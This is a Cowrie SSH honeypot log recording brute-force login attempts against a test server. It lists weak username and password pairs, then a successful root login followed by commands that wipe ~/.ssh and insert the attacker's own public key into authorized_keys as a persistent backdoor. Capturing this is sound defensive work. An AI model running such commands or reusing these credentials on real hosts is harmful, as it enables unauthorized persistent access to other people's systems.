{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:05:03.659248Z","src_ip":"212.227.235.229","session":"9de12134aa85"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:05:03.660151Z","src_ip":"212.227.235.229","session":"6a75d08735e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34734,"dst_ip":"1.2.3.4","dst_port":22,"session":"42cba416a10b","protocol":"ssh","message":"New connection: 212.227.235.229:34734 (1.2.3.4:22) [session: 42cba416a10b]","sensor":"my-vps","timestamp":"2025-08-31T06:05:06.858788Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:05:06.860107Z","src_ip":"212.227.235.229","session":"42cba416a10b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:05:07.117927Z","src_ip":"212.227.235.229","session":"42cba416a10b"}
{"eventid":"cowrie.login.failed","username":"ravi","password":"ravi@123","message":"login attempt [ravi/ravi@123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:05:08.147689Z","src_ip":"212.227.235.229","session":"42cba416a10b"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:05:09.409568Z","src_ip":"212.227.235.229","session":"42cba416a10b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35046,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8aa395ca948","protocol":"ssh","message":"New connection: 212.227.235.229:35046 (1.2.3.4:22) [session: e8aa395ca948]","sensor":"my-vps","timestamp":"2025-08-31T06:05:10.243216Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:05:10.989304Z","src_ip":"212.227.235.229","session":"e8aa395ca948"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:05:10.992205Z","src_ip":"212.227.235.229","session":"e8aa395ca948"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:05:15.820747Z","src_ip":"212.227.125.160","session":"2f732ca0137a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:05:15.821481Z","src_ip":"212.227.125.160","session":"2f732ca0137a"}
{"eventid":"cowrie.login.failed","username":"test3","password":"letmein","message":"login attempt [test3/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T06:05:16.588130Z","src_ip":"212.227.235.229","session":"e8aa395ca948"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:05:18.566019Z","src_ip":"212.227.235.229","session":"e8aa395ca948"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34596,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d31caed3fe1","protocol":"ssh","message":"New connection: 212.227.235.229:34596 (1.2.3.4:22) [session: 1d31caed3fe1]","sensor":"my-vps","timestamp":"2025-08-31T06:05:18.893890Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:05:18.895038Z","src_ip":"212.227.235.229","session":"1d31caed3fe1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:05:19.217598Z","src_ip":"212.227.235.229","session":"1d31caed3fe1"}
{"eventid":"cowrie.login.failed","username":"user36","password":"user36","message":"login attempt [user36/user36] failed","sensor":"my-vps","timestamp":"2025-08-31T06:05:20.550917Z","src_ip":"212.227.235.229","session":"1d31caed3fe1"}
{"eventid":"cowrie.session.closed","duration":"66.3","message":"Connection lost after 66.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:05:20.712216Z","src_ip":"212.227.235.229","session":"4ea85fa88256"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:05:21.875538Z","src_ip":"212.227.235.229","session":"1d31caed3fe1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42950,"dst_ip":"1.2.3.4","dst_port":22,"session":"09a4cd3ab998","protocol":"ssh","message":"New connection: 212.227.235.229:42950 (1.2.3.4:22) [session: 09a4cd3ab998]","sensor":"my-vps","timestamp":"2025-08-31T06:05:23.670679Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:05:23.671667Z","src_ip":"212.227.235.229","session":"09a4cd3ab998"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-31T06:05:23.879597Z","src_ip":"212.227.235.229","session":"09a4cd3ab998"}
{"eventid":"cowrie.login.failed","username":"ansible","password":"ansible","message":"login attempt [ansible/ansible] failed","sensor":"my-vps","timestamp":"2025-08-31T06:05:24.503121Z","src_ip":"212.227.235.229","session":"09a4cd3ab998"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:05:25.713787Z","src_ip":"212.227.235.229","session":"09a4cd3ab998"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53030,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1c05e32fc54","protocol":"ssh","message":"New connection: 212.227.125.160:53030 (1.2.3.4:22) [session: d1c05e32fc54]","sensor":"my-vps","timestamp":"2025-08-31T06:05:31.556345Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:05:31.913941Z","src_ip":"212.227.125.160","session":"d1c05e32fc54"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:05:31.914815Z","src_ip":"212.227.125.160","session":"d1c05e32fc54"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":43452,"dst_ip":"1.2.3.4","dst_port":22,"session":"415f309ba630","protocol":"ssh","message":"New connection: 43.159.36.188:43452 (1.2.3.4:22) [session: 415f309ba630]","sensor":"my-vps","timestamp":"2025-08-31T06:05:32.531787Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:05:32.532862Z","src_ip":"43.159.36.188","session":"415f309ba630"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:05:32.778098Z","src_ip":"43.159.36.188","session":"415f309ba630"}
{"eventid":"cowrie.login.failed","username":"test3","password":"letmein","message":"login attempt [test3/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T06:05:33.523634Z","src_ip":"212.227.125.160","session":"d1c05e32fc54"}
{"eventid":"cowrie.login.failed","username":"wallabag","password":"wallabag","message":"login attempt [wallabag/wallabag] failed","sensor":"my-vps","timestamp":"2025-08-31T06:05:33.800781Z","src_ip":"43.159.36.188","session":"415f309ba630"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:05:35.006423Z","src_ip":"212.227.125.160","session":"d1c05e32fc54"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:05:35.047893Z","src_ip":"43.159.36.188","session":"415f309ba630"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44440,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd2e9e2d73e6","protocol":"ssh","message":"New connection: 212.227.235.229:44440 (1.2.3.4:22) [session: bd2e9e2d73e6]","sensor":"my-vps","timestamp":"2025-08-31T06:05:38.690274Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:05:47.594799Z","src_ip":"212.227.235.229","session":"bd2e9e2d73e6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:05:47.596285Z","src_ip":"212.227.235.229","session":"bd2e9e2d73e6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53174,"dst_ip":"1.2.3.4","dst_port":22,"session":"59ee7022780e","protocol":"ssh","message":"New connection: 212.227.235.229:53174 (1.2.3.4:22) [session: 59ee7022780e]","sensor":"my-vps","timestamp":"2025-08-31T06:05:51.354742Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:05:51.355629Z","src_ip":"212.227.235.229","session":"59ee7022780e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:05:51.640724Z","src_ip":"212.227.235.229","session":"59ee7022780e"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"123456","message":"login attempt [oscar/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T06:05:52.605880Z","src_ip":"212.227.125.160","session":"2f732ca0137a"}
{"eventid":"cowrie.login.success","username":"root","password":"s0p0rt3","message":"login attempt [root/s0p0rt3] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:05:52.823921Z","src_ip":"212.227.235.229","session":"59ee7022780e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:05:53.815530Z","src_ip":"212.227.235.229","session":"59ee7022780e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:05:53.816230Z","src_ip":"212.227.235.229","session":"59ee7022780e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:05:53.817327Z","src_ip":"212.227.235.229","session":"59ee7022780e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:05:54.104041Z","src_ip":"212.227.235.229","session":"59ee7022780e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:05:54.697042Z","src_ip":"212.227.235.229","session":"59ee7022780e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:05:54.697712Z","src_ip":"212.227.235.229","session":"59ee7022780e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:05:54.984951Z","src_ip":"212.227.235.229","session":"59ee7022780e"}
